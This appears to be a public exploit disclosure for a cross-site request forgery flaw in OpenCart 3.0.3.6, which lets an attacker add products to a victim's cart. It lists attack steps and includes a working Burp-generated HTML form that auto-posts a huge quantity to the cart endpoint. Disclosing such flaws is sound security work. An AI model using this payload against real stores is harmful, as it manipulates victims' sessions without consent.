# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery# Date: 12-11-2020# Exploit Author: Mahendra Purbia {Mah3Sec}# Vendor Homepage: https://www.opencart.com# Software Link: https://www.opencart.com/index.php?route=cms/download# Version: OpenCart CMS - 3.0.3.6 # Tested on: Kali Linux#Description:
This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-listand can make his/her wish-list public which let other users to see the wish-list. Now,as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.#Additional Information:
well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost withhelp of XAMP and then i exploited that vulnerability.
Attack Vector:1. create two accounts A(attacker)& B(victim)2. login with A and add a product in cart and capture that particular request in burpsuite.3. Now change the quantity if want and then create a csrf poc of that request.4. Save it as.html and send it to victim. Now the product added to victims cart.#POC: <html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST"><inputtype="hidden" name="product_id" value="43"/><inputtype="hidden" name="quantity" value="10000000"/><inputtype="submit" value="Submit request"/></form></body></html>
